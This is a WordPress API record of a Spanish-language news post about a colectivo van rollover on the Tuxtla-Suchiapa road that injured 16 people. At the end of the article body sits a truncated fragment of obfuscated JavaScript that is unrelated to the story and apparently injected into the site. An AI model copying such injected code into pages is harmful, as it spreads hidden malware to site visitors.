{"id":19795,"date":"2025-01-14T04:14:01","date_gmt":"2025-01-14T04:14:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19795"},"modified":"2025-01-14T04:14:01","modified_gmt":"2025-01-14T04:14:01","slug":"volcadura-en-el-tramo-tuxtla-suchiapa-deja-16-lesionados","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19795","title":{"rendered":"Volcadura en el tramo Tuxtla-Suchiapa deja 16 lesionados"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"808\" height=\"1014\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0031.jpg\" alt=\"\" class=\"wp-image-19796\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0031.jpg 808w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0031-239x300.jpg 239w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0031-768x964.jpg 768w\" sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 13 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este lunes ocurri\u00f3 un fuerte accidente carretero en el tramo Tuxtla-Suchiapa dejando un saldo de 16 heridos.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando la unidad de transporte p\u00fablico en la modalidad de colectivo de la ruta 86-105-01 circulaba a exceso de velocidad y al entrar a una curva el conductor perdi\u00f3 el control y se sali\u00f3 de la carretera hasta terminar al fondo de un barranco.<\/p>\n\n\n\n<p>La unidad qued\u00f3 volcada a la altura del entronque a la comunidad Carrillo Puerto.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Bomberos, ERECH y Radio Alfa para atender a los lesionados que no sufrieron heridas de gravedad.<\/p>\n\n\n\n<p>Una gr\u00faa particular se encarg\u00f3 de sacar la Urvan la cual fue llevada a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 13 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este lunes ocurri\u00f3 un fuerte accidente carretero en el tramo Tuxtla-Suchiapa dejando un saldo de 16 heridos. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando la unidad de transporte p\u00fablico en la modalidad de colectivo de la ruta 86-105-01 circulaba a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19796,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19795","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19795","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19795"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19795\/revisions"}],"predecessor-version":[{"id":19797,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19795\/revisions\/19797"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19796"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19795"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19795"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19795"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}